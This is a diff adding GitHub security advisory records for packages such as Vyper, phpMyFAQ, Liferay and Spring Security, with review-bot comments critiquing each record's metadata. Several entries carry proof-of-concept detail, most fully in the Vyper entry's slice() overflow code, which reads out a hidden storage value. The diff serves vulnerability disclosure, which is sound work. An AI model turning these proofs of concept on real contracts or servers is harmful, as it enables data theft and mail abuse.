@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-944j-8ch6-rf6x", + "modified": "2024-02-05T22:41:57Z", + "published": "2024-02-05T21:30:31Z", + "aliases": [ + "CVE-2023-50781" + ], + "summary": "m2crypto Bleichenbacher timing attack - incomplete fix for CVE-2020-25657", + "details": "A flaw was found in m2crypto. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "m2crypto" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.40.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50781" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-50781" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254426" + }, + { + "type": "PACKAGE", + "url": "https://gitlab.com/m2crypto/m2crypto" + }, + { + "type": "WEB", + "url": "https://gitlab.com/m2crypto/m2crypto/-/issues/342" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-208" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T22:41:57Z", + "nvd_published_at": "2024-02-05T21:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-99f9-gv72-fw9r/GHSA-99f9-gv72-fw9r.json b/advisories/github-reviewed/2024/02/GHSA-99f9-gv72-fw9r/GHSA-99f9-gv72-fw9r.json new file mode 100644 index 0000000000000..5e687a753d837 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-99f9-gv72-fw9r/GHSA-99f9-gv72-fw9r.json 
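Review bot: The range ends with `last_affected: 0.40.1` and no `fixed` event, so this record asserts every release through 0.40.1 is vulnerable and says nothing about later ones; the summary calls this an incomplete fix for CVE-2020-25657, but that relation exists only in prose. OSV 1.4.0 has a top-level `related` array for exactly this, so `"related": ["CVE-2020-25657"]` would make the link machine-readable, and `last_affected` should be replaced by `fixed` once upstream ships a release (the linked GitLab issue #342 is where to track that). The `details` text also does not say which API path is affected — a Bleichenbacher oracle implies the RSA PKCS#1 v1.5 decryption path used for TLS RSA key exchange, but that is inferred, not stated — which a user deciding whether they are exposed would want spelled out.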
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-99f9-gv72-fw9r", + "modified": "2024-02-01T20:53:08Z", + "published": "2024-02-01T20:53:08Z", + "aliases": [ + "CVE-2024-24753" + ], + "summary": "Bref Doesn't Support Multiple Value Headers in ApiGatewayFormatV2", + "details": "## Impacted Resources\n\nbref/src/Event/Http/HttpResponse.php:61-90\n\n## Description\n\nWhen Bref is used in combination with an API Gateway with the v2 format, it does not handle multiple values headers.\n\nPrecisely, if PHP generates a response with two headers having the same key but different values only the latest one is kept.\n\n## Impact\n\nIf an application relies on multiple headers with the same key being set for security reasons, then Bref would lower the application security.\n\nFor example, if an application sets multiple `Content-Security-Policy` headers, then Bref would just reflect the latest one.\n\n## PoC\n\n1. Create a new Bref project.\n2. Create an `index.php` file with the following content:\n```php\n\n\n\n```\n3. Use the following `serverless.yml` to deploy the Lambda:\n```yaml\nservice: app\n\nprovider:\n name: aws\n region: eu-central-1\n\nplugins:\n - ./vendor/bref/bref\n\nfunctions:\n api:\n handler: index.php\n description: ''\n runtime: php-81-fpm\n timeout: 28 # in seconds (API Gateway has a timeout of 29 seconds)\n events:\n - httpApi: '*'\n\n# Exclude files from deployment\npackage:\n patterns:\n - '!node_modules/**'\n - '!tests/**'\n```\n4. Browse the Lambda URL.\n5. Notice that the JavaScript code is executed as the `Content-Security-Policy: script-src 'none'` header has been removed.\n6. Notice that the external image has not been loaded as the `Content-Security-Policy: img-src 'self'` header has been kept.\n7. Start a PHP server inside the project directory (e.g. `php -S 127.0.0.1:8090`).\n8. Browse the `index.php` script through the PHP server (e.g. http://127.0.0.1:8090/index.php).\n9. 
Notice that the JavaScript code is not executed as the `Content-Security-Policy: script-src 'none'` header has been kept.\n10. Notice that the external image has not been loaded as the `Content-Security-Policy: img-src 'self'` header has been kept.\n\n## Suggested Remediation\n\nConcatenate all the multiple value headers' values with a comma (`,`) as separator and return a single header with all the values to the API Gateway.\n\n## References\n\n- https://www.rfc-editor.org/rfc/rfc9110.html#section-5.2", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "bref/bref" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.1.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/security/advisories/GHSA-99f9-gv72-fw9r" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24753" + }, + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/commit/f834027aaf88b3885f4aa8edf6944ae920daf2dc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/brefphp/bref" + }, + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/blob/2.1.12/src/Event/Http/HttpResponse.php#L61-L90" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-436" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:53:08Z", + "nvd_published_at": "2024-02-01T16:17:14Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-9cgf-pxwq-2cpw/GHSA-9cgf-pxwq-2cpw.json b/advisories/github-reviewed/2024/02/GHSA-9cgf-pxwq-2cpw/GHSA-9cgf-pxwq-2cpw.json new file mode 100644 index 0000000000000..6831bd0cf0ece --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9cgf-pxwq-2cpw/GHSA-9cgf-pxwq-2cpw.json 
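Review bot: The PoC's step 2 fenced block (` ```php ... ``` `) is empty in `details`, so steps 5 and 6, which depend on the `Content-Security-Policy: script-src 'none'` and `img-src 'self'` headers that `index.php` is supposed to emit, cannot be reproduced from this record; the `header()` calls and the markup that triggers the script and image loads need to be restored, presumably lost with the `<?php` tag on import. The Suggested Remediation of joining repeated headers with a comma is fine for CSP, but the cited RFC 9110 (in the field-order section adjacent to the one linked, if I recall correctly) singles out `Set-Cookie` as a field that must not be comma-merged; a caveat such as `Set-Cookie must be emitted through API Gateway v2's separate cookies list, not concatenated` would stop the fix trading header loss for cookie corruption. Whether commit f834027 already handles that is not visible here.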
@@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9cgf-pxwq-2cpw", + "modified": "2024-02-05T22:33:49Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24397" + ], + "summary": "Stimulsoft Dashboard.JS Cross Site Scripting vulnerability", + "details": "Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the ReportName field.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "stimulsoft-dashboards-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2024.1.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24397" + }, + { + "type": "WEB", + "url": "https://cloud-trustit.spp.at/s/Pi78FFazHamJQ5R" + }, + { + "type": "WEB", + "url": "https://cves.at/posts/cve-2024-24397/writeup/" + }, + { + "type": "PACKAGE", + "url": "https://github.com/stimulsoft/Dashboards.JS" + }, + { + "type": "WEB", + "url": "http://stimulsoft.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T22:33:49Z", + "nvd_published_at": "2024-02-05T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-9gh8-877r-g477/GHSA-9gh8-877r-g477.json b/advisories/github-reviewed/2024/02/GHSA-9gh8-877r-g477/GHSA-9gh8-877r-g477.json new file mode 100644 index 0000000000000..610d071a2f746 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9gh8-877r-g477/GHSA-9gh8-877r-g477.json 
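Review bot: `cwe_ids` is empty even though `summary` and `details` describe a cross-site scripting bug, while the companion record for the same package in this diff (GHSA-9m6m-c64r-w4f4, CVE-2024-24396) carries `CWE-79`; the two should agree, so `"cwe_ids": ["CWE-79"]` belongs here too. The `severity` array is also empty while `database_specific.severity` is `MODERATE`, so the rating has no vector behind it. The fix claim `fixed: 2024.1.2` is backed only by a researcher write-up and a file-share link; a vendor release note or commit reference would make the fixed version verifiable.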
@@ -0,0 +1,58 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9gh8-877r-g477", + "modified": "2024-02-06T18:39:23Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2024-22533" + ], + "summary": "Beetl Server-Side Template Injection vulnerability", + "details": "Before Beetl v3.15.13.RELEASE, the rendering template has a server-side template injection (SSTI) vulnerability. When the incoming template is controllable, it will be filtered by the DefaultNativeSecurityManager blacklist. Because blacklist filtering is not strict, the blacklist can be bypassed, leading to arbitrary code execution.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.ibeetl:beetl-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.15.13.RELEASE" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22533" + }, + { + "type": "PACKAGE", + "url": "https://gitee.com/xiandafu/beetl" + }, + { + "type": "WEB", + "url": "https://gitee.com/xiandafu/beetl/issues/I8RU01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T18:10:29Z", + "nvd_published_at": "2024-02-02T03:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-9gp8-6cg8-7h34/GHSA-9gp8-6cg8-7h34.json b/advisories/github-reviewed/2024/02/GHSA-9gp8-6cg8-7h34/GHSA-9gp8-6cg8-7h34.json new file mode 100644 index 0000000000000..11f34cc0587b2 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9gp8-6cg8-7h34/GHSA-9gp8-6cg8-7h34.json 
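Review bot: `details` describes a blacklist bypass in `DefaultNativeSecurityManager` leading to arbitrary code execution, but `cwe_ids` is empty and there is no CVSS vector, so the `MODERATE` rating cannot be checked against the description; `CWE-1336` (template-engine injection) or `CWE-94` would fit the text, and if the precondition "when the incoming template is controllable" is what keeps this at MODERATE, that reasoning should be stated. The only technical reference is the Gitee issue; nothing backs `fixed: 3.15.13.RELEASE` with a commit or release link. Users who cannot upgrade get no guidance — if Beetl allows substituting the security manager with an allow-list implementation, a sentence saying so would be the practical mitigation; I am not asserting that option exists from this record.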
@@ -0,0 +1,134 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9gp8-6cg8-7h34", + "modified": "2024-02-06T15:52:33Z", + "published": "2024-02-06T00:30:25Z", + "aliases": [ + "CVE-2023-34042" + ], + "summary": "Spring Security's spring-security.xsd file is world writable", + "details": "The spring-security.xsd file inside the spring-security-config jar is world writable which means that if it were extracted it could be written by anyone with access to the file system.\n\nWhile there are no known exploits, this is an example of “CWE-732: Incorrect Permission Assignment for Critical Resource” and could result in an exploit. Users should update to the latest version of Spring Security to mitigate any future exploits found around this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.springframework.security:spring-security-config" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.1.1" + }, + { + "fixed": "6.1.4" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.1.3" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.springframework.security:spring-security-config" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.4" + }, + { + "fixed": "6.0.7" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.6" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.springframework.security:spring-security-config" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.8.4" + }, + { + "fixed": "5.8.7" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.8.6" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.springframework.security:spring-security-config" + }, + "ranges": [ + { + "type": "ECOSYSTEM", 
+ "events": [ + { + "introduced": "5.7.9" + }, + { + "fixed": "5.7.11" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.7.10" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34042" + }, + { + "type": "WEB", + "url": "https://github.com/spring-projects/spring-security/commit/5b293d21161e946bf241d9e974b9af93cfafaaac" + }, + { + "type": "PACKAGE", + "url": "https://github.com/spring-projects/spring-security" + }, + { + "type": "WEB", + "url": "https://spring.io/security/cve-2023-34042" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T15:52:33Z", + "nvd_published_at": "2024-02-05T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-9hhf-xmcw-r3xg/GHSA-9hhf-xmcw-r3xg.json b/advisories/github-reviewed/2024/02/GHSA-9hhf-xmcw-r3xg/GHSA-9hhf-xmcw-r3xg.json new file mode 100644 index 0000000000000..a1ea48a8349b1 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9hhf-xmcw-r3xg/GHSA-9hhf-xmcw-r3xg.json 
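Review bot: The `details` text rightly limits the risk to the case where the jar is extracted, but gives an operator no way to tell whether they are exposed; a sentence such as `Check the stored Unix mode of spring-security.xsd with zipinfo (unzip -Z spring-security-config-<ver>.jar); a mode ending in rw-rw-rw- is an affected build` would make the four patch-level `introduced` boundaries (5.7.9, 5.8.4, 6.0.4, 6.1.1) verifiable rather than taken on trust. Extraction by the user's own tooling (container image layers, exploded-WAR deployments) is where the mode actually materialises, and the obvious workaround for anyone stuck on an affected version — `chmod o-w` on the extracted file — is absent; hedged, since the record does not say which extractors preserve the bit. The per-range `last_known_affected_version_range` values agree with the `fixed` events, so the data side looks consistent.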
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9hhf-xmcw-r3xg", + "modified": "2024-02-05T23:05:22Z", + "published": "2024-02-05T20:21:25Z", + "aliases": [ + "CVE-2024-22208" + ], + "summary": "phpMyFAQ sharing FAQ functionality can easily be abused for phishing purposes", + "details": "### Summary\nThe 'sharing FAQ' functionality allows any unauthenticated actor to misuse the phpMyFAQ application to send arbitrary emails to a large range of targets.\n\n### Details\nThe phpMyFAQ application has a functionality where anyone can share a FAQ item to others. The front-end of this functionality allows any phpMyFAQ articles to be shared with 5 email addresses. The application will then send these 5 emails. However, there are no controls over what link and content are shared. Furthermore, any unauthenticated actor can perform this action. There is a CAPTCHA in place, however the amount of people you email with a single request is not limited to 5 by the backend. An attacker can thus solve a single CAPTCHA and send thousands of emails at once. \n\n### PoC\nWe send the following form and capture the request.\n![image](https://user-images.githubusercontent.com/44903767/296291204-4a472536-9838-4f9e-bd95-df3d886af43f.png)\n\nWe now change the body to contain 50 email addresses instead of just 1, and send the request. The attacker can also change the body of the email to any phishing message.\n![image](https://user-images.githubusercontent.com/44903767/296291441-bba85a6c-45be-4f07-9385-e6da27713e35.png)\n\nBelow are the logs of the email server, proving that all these emails were sent.\n![image](https://user-images.githubusercontent.com/44903767/296291673-d324be20-74b9-4e16-b25d-aa9b1dd75d5a.png)\n\nAn attacker can also change the link that is sent in these emails. 
Making phishing even more possible.\n![image](https://user-images.githubusercontent.com/44903767/296291897-8c0a40e7-cd4b-4021-8f4d-4362e10ad36b.png)\n\n### Impact\nAn attacker can utilize the target application's email server to send phishing messages. This can get the server on a blacklist, causing all emails to end up in spam. It can also lead to reputational damages.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "phpmyfaq/phpmyfaq" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.2.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9hhf-xmcw-r3xg" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22208" + }, + { + "type": "WEB", + "url": "https://github.com/thorsten/phpMyFAQ/commit/a34d94ab7b1be9256a9ef898f18ea6bfb63f6f1e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/thorsten/phpMyFAQ" + }, + { + "type": "WEB", + "url": "https://www.phpmyfaq.de/security/advisory-2024-02-05" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T20:21:25Z", + "nvd_published_at": "2024-02-05T21:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-9m6m-c64r-w4f4/GHSA-9m6m-c64r-w4f4.json b/advisories/github-reviewed/2024/02/GHSA-9m6m-c64r-w4f4/GHSA-9m6m-c64r-w4f4.json new file mode 100644 index 0000000000000..36a98827e6efd --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9m6m-c64r-w4f4/GHSA-9m6m-c64r-w4f4.json 
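Review bot: `details` actually describes two independent weaknesses — the backend does not enforce the 5-recipient cap the front-end shows, so one solved CAPTCHA sends to an unbounded list, and the link and message body are attacker-controlled — but the record only says `fixed: 3.2.5` and does not state which of the two commit a34d94a addresses; a reader patching against phishing needs to know whether arbitrary link/body content is still accepted after upgrading. `CWE-863` (incorrect authorization) fits neither issue well: the recipient problem reads as missing server-side validation / interaction-frequency control (CWE-20 or CWE-799) and the link problem as content injection into outbound mail, so the classification is worth revisiting. The CVSS `I:L/A:L` matches the stated mail-relay abuse, so the scoring itself looks consistent with the text.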
@@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9m6m-c64r-w4f4", + "modified": "2024-02-05T22:58:08Z", + "published": "2024-02-05T21:30:31Z", + "aliases": [ + "CVE-2024-24396" + ], + "summary": "Stimulsoft Dashboard.JS Cross Site Scripting vulnerability", + "details": "Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the search bar component.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "stimulsoft-dashboards-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2024.1.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24396" + }, + { + "type": "WEB", + "url": "https://cloud-trustit.spp.at/s/Pi78FFazHamJQ5R" + }, + { + "type": "WEB", + "url": "https://cves.at/posts/cve-2024-24396/writeup/" + }, + { + "type": "PACKAGE", + "url": "https://github.com/stimulsoft/Dashboards.JS" + }, + { + "type": "WEB", + "url": "http://stimulsoft.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T22:58:08Z", + "nvd_published_at": "2024-02-05T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-9vgq-w5pv-v77q/GHSA-9vgq-w5pv-v77q.json b/advisories/github-reviewed/2024/02/GHSA-9vgq-w5pv-v77q/GHSA-9vgq-w5pv-v77q.json new file mode 100644 index 0000000000000..8999b7a5223cc --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9vgq-w5pv-v77q/GHSA-9vgq-w5pv-v77q.json 
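Review bot: The `details` sentence "allows a remote attacker to execute arbitrary code" overstates a cross-site scripting issue: the `CWE-79` classification implies script execution in a victim's browser within the application's origin, not code execution on the host, and the current wording steers triage toward an RCE response. Rewording to `allows a remote attacker to execute arbitrary script in the context of a user's browser via a crafted payload to the search bar component` keeps the claim within what the record supports. As with the sibling Stimulsoft entry, the `severity` array is empty and no vendor reference backs `fixed: 2024.1.2`.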
@@ -0,0 +1,118 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9vgq-w5pv-v77q", + "modified": "2024-02-07T21:21:02Z", + "published": "2024-02-07T15:30:50Z", + "aliases": [ + "CVE-2024-25145" + ], + "summary": "Liferay Portal stored cross-site scripting (XSS) vulnerability", + "details": "Stored cross-site scripting (XSS) vulnerability in the Portal Search module's Search Result app in Liferay Portal 7.2.0 through 7.4.3.11, and older unsupported versions, and Liferay DXP 7.4 before update 8, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML into the Search Result app's search result if highlighting is disabled by adding any searchable content (e.g., blog, message board message, web content article) to the application.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.portal.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.4.3.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.4.0" + }, + { + "fixed": "7.4.3.13u8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.3.0" + }, + { + "fixed": "7.3.10.u4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.2.10.fp17" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25145" + }, + { + "type": 
"PACKAGE", + "url": "https://github.com/liferay/liferay-portal" + }, + { + "type": "WEB", + "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25145" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T21:21:02Z", + "nvd_published_at": "2024-02-07T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-9x7f-gwxq-6f2c/GHSA-9x7f-gwxq-6f2c.json b/advisories/github-reviewed/2024/02/GHSA-9x7f-gwxq-6f2c/GHSA-9x7f-gwxq-6f2c.json new file mode 100644 index 0000000000000..c80abc38ab829 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9x7f-gwxq-6f2c/GHSA-9x7f-gwxq-6f2c.json 
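Review bot: The CVSS vector `AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H` (the basis for the `CRITICAL` rating) contradicts `details`, which says the bug is exploitable by "remote authenticated users" who must add searchable content — that is `PR:L` at minimum, and C:H/I:H/A:H is far above how a stored XSS is normally scored; either the vector or the description is wrong and the rating should be re-derived once that is settled. The precondition "if highlighting is disabled" is a meaningful mitigation buried mid-sentence; deployments with highlighting enabled appear unaffected per the text and that deserves its own sentence. The DXP `fixed` strings use two shapes (`7.3.10.u4` with a dot before the update marker, `7.4.3.13u8` without), which is worth checking against how those artifacts are actually versioned before relying on ECOSYSTEM range matching.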
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9x7f-gwxq-6f2c",
+ "modified": "2024-02-01T20:51:32Z",
+ "published": "2024-02-01T20:51:32Z",
+ "aliases": [
+ "CVE-2024-24561"
+ ],
+ "summary": "Vyper's bounds check on built-in `slice()` function can be overflowed",
+ "details": "## Summary\n\n[The bounds check for slices](https://github.com/vyperlang/vyper/blob/b01cd686aa567b32498fefd76bd96b0597c6f099/vyper/builtins/functions.py#L404-L457) does not account for the ability for `start + length` to overflow when the values aren't literals. \n\nIf a `slice()` function uses a non-literal argument for the `start` or `length` variable, this creates the ability for an attacker to overflow the bounds check. \n\nThis issue can be used to do OOB access to storage, memory or calldata addresses. It can also be used to corrupt the `length` slot of the respective array.\n\nA contract search was performed and no vulnerable contracts were found in production.\n\ntracking in issue https://github.com/vyperlang/vyper/issues/3756.\n\n## Details\nHere the flow for `storage` is supposed, but it is generalizable also for the other locations.\n\nWhen calling `slice()` on a storage value, there are compile time bounds checks if the `start` and `length` values are literals, but of course this cannot happen if they are passed values:\n\n```python\nif not is_adhoc_slice:\n if length_literal is not None:\n if length_literal < 1:\n raise ArgumentException(\"Length cannot be less than 1\", length_expr)\n\n if length_literal > arg_type.length:\n raise ArgumentException(f\"slice out of bounds for {arg_type}\", length_expr)\n\n if start_literal is not None:\n if start_literal > arg_type.length:\n raise ArgumentException(f\"slice out of bounds for {arg_type}\", start_expr)\n if length_literal is not None and start_literal + length_literal > arg_type.length:\n raise ArgumentException(f\"slice out of bounds for {arg_type}\", node)\n```\n\nAt runtime, we perform the following equivalent check, but the runtime check does not account for overflows:\n```python\n[\"assert\", [\"le\", [\"add\", start, length], src_len]], # bounds check\n```\n\nThe storage `slice()` function copies bytes directly from storage into memory and returns the memory value of the resulting slice. This means that, if a user is able to input the `start` or `length` value, they can force an overflow and access an unrelated storage slot.\n\nIn most cases, this will mean they have the ability to forcibly return `0` for the slice, even if this shouldn't be possible. In extreme cases, it will mean they can return another unrelated value from storage.\n\n## POC: OOB access\n\nFor simplicity, take the following Vyper contract, which takes an argument to determine where in a `Bytes[64]` bytestring should be sliced. It should only accept a value of zero, and should revert in all other cases.\n\n```python\n# @version ^0.3.9\n\nx: public(Bytes[64])\nsecret: uint256\n\n@external\ndef __init__():\n self.x = empty(Bytes[64])\n self.secret = 42\n\n@external\ndef slice_it(start: uint256) -> Bytes[64]:\n return slice(self.x, start, 64)\n```\n\nWe can use the following manual storage to demonstrate the vulnerability:\n```json\n{\"x\": {\"type\": \"bytes32\", \"slot\": 0}, \"secret\": {\"type\": \"uint256\", \"slot\": 3618502788666131106986593281521497120414687020801267626233049500247285301248}}\n```\n\nIf we run the following test, passing `max - 63` as the `start` value, we will overflow the bounds check, but access the storage slot at `1 + (2**256 - 63) / 32`, which is what was set in the above storage layout:\n```solidity\nfunction test__slice_error() public {\n c = SuperContract(deployer.deploy_with_custom_storage(\"src/loose/\", \"slice_error\", \"slice_error_storage\"));\n bytes memory result = c.slice_it(115792089237316195423570985008687907853269984665640564039457584007913129639872); // max - 63\n console.logBytes(result);\n}\n```\n\nThe result is that we return the secret value from storage:\n```\nLogs:\n0x0000...00002a\n```\n## POC: `length` corruption\n`OOG` exception doesn't have to be raised - because of the overflow, only a few bytes can be copied, but the `length` slot is set with the original input value.\n\n```python\nd: public(Bytes[256])\n\t\n@external\ndef test():\n\tx : uint256 = 115792089237316195423570985008687907853269984665640564039457584007913129639935 # 2**256-1\n\tself.d = b\"\\x01\\x02\\x03\\x04\\x05\\x06\"\n\t# s : Bytes[256] = slice(self.d, 1, x)\n\tassert len(slice(self.d, 1, x))==115792089237316195423570985008687907853269984665640564039457584007913129639935\n```\nThe corruption of `length` can be then used to read dirty memory:\n```python\n@external\ndef test():\n x: uint256 = 115792089237316195423570985008687907853269984665640564039457584007913129639935 # 2**256 - 1\n y: uint256 = 22704331223003175573249212746801550559464702875615796870481879217237868556850 # 0x3232323232323232323232323232323232323232323232323232323232323232\n z: uint96 = 1\n if True:\n placeholder : uint256[16] = [y, y, y, y, y, y, y, y, y, y, y, y, y, y, y, y]\n s :String[32] = slice(uint2str(z), 1, x)\t# uint2str(z) == \"1\"\n #print(len(s))\n assert slice(s, 1, 2) == \"22\"\n```\n\n## Impact\n\nThe built-in `slice()` method can be used for OOB accesses or the corruption of the `length` slot.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "vyper"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "0.3.10"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/vyperlang/vyper/security/advisories/GHSA-9x7f-gwxq-6f2c"
+ },
+ {
